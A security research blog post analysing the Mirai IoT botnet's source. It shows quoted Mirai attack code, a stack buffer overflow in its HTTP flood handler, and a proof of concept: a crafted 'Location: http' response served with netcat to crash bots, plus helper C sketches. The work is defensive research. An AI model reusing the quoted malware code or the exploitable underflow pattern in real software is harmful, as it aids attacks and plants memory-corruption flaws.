Killing Mirai: Active defense against an IoT botnet (Part 1)

By: Scott Tenaglia

October 22, 2016

In recent weeks the world has witnessed the concept of an IoT botnet turn from theory to reality, with devastating consequences. While ISPs, DDoS mitigation services, and others scramble to figure out how to augment traditional defenses to handle this new threat, we decided to investigate a less conventional approach. Attackers often rely on exploiting vulnerabilities in software we own to install their tools on our systems. When these tools reside on an IoT device, things become even more complicated, because the attacker may now have more access to the device than we do. So why not use their own strategy against them?

This is the first in a series of posts that will uncover vulnerabilities in the Mirai botnet, and show how exploiting these vulnerabilities can be used to stop attacks. Note, we are not advocating counterattack, but merely showing the possibility of using an active defense strategy to combat a new form of an old threat.

In the beginning…

It’s important to understand how Mirai initiates an attack, in order to understand the implications of exploiting vulnerabilities in the attack code. The code below is Mirai’s attack_start() function, defined in bot/attack.c.

void attack_start(int duration, ATTACK_VECTOR vector, uint8_t targs_len, struct attack_target *targs, uint8_t opts_len, struct attack_option *opts)
{
    int pid1, pid2;
 
    pid1 = fork();
    if (pid1 == -1 || pid1 > 0)
        return;
 
    pid2 = fork();
    if (pid2 == -1)
        exit(0);
    else if (pid2 == 0)
    {
        sleep(duration);
        kill(getppid(), 9);
        exit(0);
    }
    else
    {
        int i;
 
        for (i = 0; i < methods_len; i++)
        {
            if (methods[i]->vector == vector)
            {
#ifdef DEBUG
                printf("[attack] Starting attack...\n");
#endif
                methods[i]->func(targs_len, targs, opts_len, opts);
                break;
            }
        }
 
        //just bail if the function returns
        exit(0);
    }
}

Lines 5-7 fork a child process that will actually carry out the attack. Lines 9-16 fork another child process that will kill the attack after the specified duration, simply by sleeping for that duration and then killing the parent process when it wakes. Finally, the attack process invokes the correct function handler for the specified attack (lines 22-32), and then exits (line 35). This means that if the attack process crashes, then the attack will stop but the bot itself will remain functional.
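The isolation property described above can be illustrated with a small sketch. This is not Mirai's code: run_isolated and crashing_worker are hypothetical names introduced here, and unlike the bot, the parent calls waitpid() purely so that the outcome can be observed.

```c
#include <assert.h>
#include <signal.h>
#include <stddef.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Hypothetical worker that dies the way the attack process does in the PoC. */
void crashing_worker(void)
{
    signal(SIGSEGV, SIG_DFL);   /* make sure the default action applies */
    raise(SIGSEGV);
}

/*
 * Run worker() in a forked child and report how the child ended:
 * the terminating signal number, 0 for a normal exit, -1 on error.
 * Mirai's parent returns immediately instead of waiting; the waitpid()
 * call is an addition so that the result can be inspected.
 */
int run_isolated(void (*worker)(void))
{
    assert(worker != NULL);

    pid_t pid = fork();
    if (pid == -1)
        return -1;

    if (pid == 0) {
        worker();
        _exit(0);               /* only reached if the worker returns */
    }

    int status = 0;
    if (waitpid(pid, &status, 0) != pid)
        return -1;

    return WIFSIGNALED(status) ? WTERMSIG(status) : 0;
}
```

Calling run_isolated(crashing_worker) hands SIGSEGV back to a caller that is still running. The crash stays confined to the forked process, which is the property the rest of this post relies on.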

It’s all about Location, Location, Location

Perhaps the most significant finding is a stack buffer overflow vulnerability in the HTTP flood attack code. When exploited it will cause a segmentation fault (i.e. SIGSEGV) to occur, crash the process, and therefore terminate the attack from that bot. The vulnerable code has to do with how Mirai processes the HTTP location header that may be part of the HTTP response sent from an HTTP flood request. It resides in the attack_app_http() function of bot/attack_app.c, and is as follows:

int offset = util_stristr(generic_memes, ret, table_retrieve_val(TABLE_ATK_LOCATION_HDR, NULL));
if (generic_memes[offset] == ' ')
    offset++;

int nl_off = util_memsearch(generic_memes + offset, ret - offset, "\r\n", 2);
if (nl_off != -1)
{
    char *loc_ptr = &(generic_memes[offset]);
    if (nl_off >= 2)
        nl_off -= 2;
    generic_memes[offset + nl_off] = 0;

    //increment it one so that it is length of the string excluding null char instead of 0-based offset
    nl_off++;

    if (util_memsearch(loc_ptr, nl_off, "http", 4) == 4)
    {
        //this is an absolute url, domain name change maybe?
        ii = 7;
        //http(s)
        if (loc_ptr[4] == 's')
            ii++;

        memmove(loc_ptr, loc_ptr + ii, nl_off - ii);

To start, let’s assume that the location header is something benign, like:

Location: http://google.com\r\n

At the point where the above code is executing, the generic_memes buffer contains the entire HTTP response. Lines 1-3 find the location header and populate the offset variable with the index of the start of the URL (i.e. the 'h' character). Then, lines 5-15 populate the nl_off variable with the index of the '\r\n' that terminates the header value. It’s important to note that this is a zero-based index from the beginning of the URL, NOT the beginning of the location header or the generic_memes buffer. The call to memmove on line 24 attempts to remove the "http://" from the URL by simply shifting what comes after it to the left 7 characters. This is why the ii variable is set to 7 on line 19. In the benign case nl_off is 18, which means that the len parameter of memmove is nl_off - ii or 18 - 7:

memmove(loc_ptr, loc_ptr + 7, 11);

This successfully shifts “google.com” (a 10-character string plus null-terminator) to the left 7 characters. However, if instead the location header were:

Location: http\r\n

Then nl_off is 5, which means that the len parameter of memmove is nl_off - ii or 5 - 7:

memmove(loc_ptr, loc_ptr + 7, -2);

The len parameter of memmove is treated as an unsigned integer (i.e. of type size_t), which means that -2 is treated as a very large positive number: 0xFFFFFFFE on a 32-bit system. Therefore, memmove will overflow the generic_memes buffer and corrupt a whole bunch of memory.
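The arithmetic for both headers can be replayed in isolation. The sketch below is an illustration under stated assumptions, not Mirai's code: find_end is a hypothetical stand-in for the search helper, assumed to return the offset just past the match (which is what the == 4 comparison and the quoted nl_off values suggest), and memmove_len_32 models a 32-bit size_t with uint32_t so the result does not depend on the machine it runs on.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/*
 * Hypothetical stand-in for the search helper: returns the offset just
 * past the first occurrence of pat in buf, or -1 if there is none.
 */
int find_end(const char *buf, int buf_len, const char *pat, int pat_len)
{
    for (int i = 0; i + pat_len <= buf_len; i++)
        if (memcmp(buf + i, pat, (size_t)pat_len) == 0)
            return i + pat_len;
    return -1;
}

/* Repeat the nl_off arithmetic from the excerpt on a header value. */
int trace_nl_off(const char *value, int len)
{
    assert(value != NULL && len >= 0);

    int nl_off = find_end(value, len, "\r\n", 2);
    if (nl_off == -1)
        return -1;
    if (nl_off >= 2)
        nl_off -= 2;        /* step back over the "\r\n" */
    return nl_off + 1;      /* count the terminator written in its place */
}

/* Length memmove() would see if size_t were 32 bits wide. */
uint32_t memmove_len_32(int nl_off, int ii)
{
    return (uint32_t)(nl_off - ii);
}
```

With the benign value "http://google.com\r\n", trace_nl_off yields 18 and memmove_len_32(18, 7) is 11. With "http\r\n" it yields 5, and memmove_len_32(5, 7) wraps to 0xFFFFFFFE.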

PoC

To verify that the vulnerability is indeed exploitable we set up 3 virtual machines to run the Mirai command and control server, a debug instance of the Mirai bot, and a victim. All virtual machines are 32-bit instances of Ubuntu 16.04. The victim simply serves up a file called location_attack with the following contents (carriage-return and new-line replaced with ‘\r’ and ‘\n’ for readability):

HTTP/1.0 200 OK
Location: http\r\n
\r\n

An instance of netcat listening on port 80 will suffice to actually serve the file:

nc -l 80 < location_attack
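The served file has to contain real carriage-return and line-feed bytes, so it can be convenient to generate it rather than type it. The following is a minimal sketch of one way to do that. The function names are hypothetical, and the CRLF after the status line is an assumption, since the listing above does not show one.

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

/* The PoC response; the CRLF after the status line is an assumption. */
static const char LOCATION_ATTACK[] =
    "HTTP/1.0 200 OK\r\n"
    "Location: http\r\n"
    "\r\n";

/*
 * Copy the response (without the trailing NUL) into buf.
 * Returns its length, or 0 if buf is too small.
 */
size_t build_location_attack(char *buf, size_t cap)
{
    assert(buf != NULL);

    size_t len = sizeof(LOCATION_ATTACK) - 1;
    if (cap < len)
        return 0;
    memcpy(buf, LOCATION_ATTACK, len);
    return len;
}

/* Write the response to path in binary mode; 0 on success, -1 on failure. */
int write_location_attack(const char *path)
{
    char buf[64];
    size_t len = build_location_attack(buf, sizeof(buf));

    FILE *fp = fopen(path, "wb");
    if (fp == NULL)
        return -1;

    size_t written = fwrite(buf, 1, len, fp);
    if (fclose(fp) != 0 || written != len)
        return -1;
    return 0;
}
```

Calling write_location_attack("location_attack") produces a file that the netcat command above can serve unchanged.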

As mentioned previously, the bot forks before executing the attack code, so when observing the bot’s debug console there is no visual indicator that it crashes, other than the cessation of the attack. Instead, we’ll show GDB catching the SIGSEGV and examine the program’s state. To start, let’s take a look at how we actually execute an attack with the command and control server.

Figure 1: Using Mirai’s CNC console to execute an HTTP flood attack

By default the bot will send a GET request to the victim (Figure 2). Note that it also inserted the foo.com domain in the host header field.

Figure 2: An HTTP flood request seen by the victim

Finally, let’s see what happened to the bot. Figure 3 shows a running instance of the Mirai bot compiled with debug flags and running in GDB. At the top of the figure the “Starting attack…” debug message is printed from the attack_start() function discussed above, followed by the exact HTTP flood request that we saw the victim receive. Next, we see that the program receives a SIGSEGV immediately after receiving our location header exploit.

Figure 3: Debug compilation of Mirai bot running in GDB and crashing on the response from the victim

Figure 4 shows what the stack looks like immediately after the crash. Using the backtrace command it is clear that the crash occurred in memmove, which was called by attack_app_http, but the rest of the stack seems to be corrupted. This coincides with what one would expect after overflowing the generic_memes buffer, because it is defined on the stack:

char generic_memes[10241] = {0};

Figure 4: Verifying stack corruption with the GDB backtrace command

Finally, to drive the point home let’s check the values of nl_off and ii.

Figure 5: Verifying that `nl_off` and `ii` have the correct values

Conclusion

This simple “exploit” is an example of active defense against an IoT botnet that could be used by any DDoS mitigation service to defend against a Mirai-based HTTP flood attack in real time. While it can’t be used to remove the bot from the IoT device, it can be used to halt the attack originating from that particular device. Unfortunately, it’s specific to the HTTP flood attack, so it would not help mitigate the recent DNS-based DDoS attack that rendered many websites inaccessible. In subsequent posts we’ll examine vulnerabilities in other attack code that may be useful in developing mitigations for other types of attacks.

About the Author

Scott Tenaglia

Scott Tenaglia is a research director and senior principal research engineer at Two Six Labs. He manages a portfolio of US government-sponsored cyber R&D programs that explore a range of topics, to include cyber attribution, vulnerability research, and secure software design. Tenaglia also heads Two Six Labs' device assessment offering, which provides deep forensic analysis of embedded devices, such as point-of-sale skimmers and shimmers. Previously, Tenaglia was a lead cybersecurity engineer at MITRE Corporation.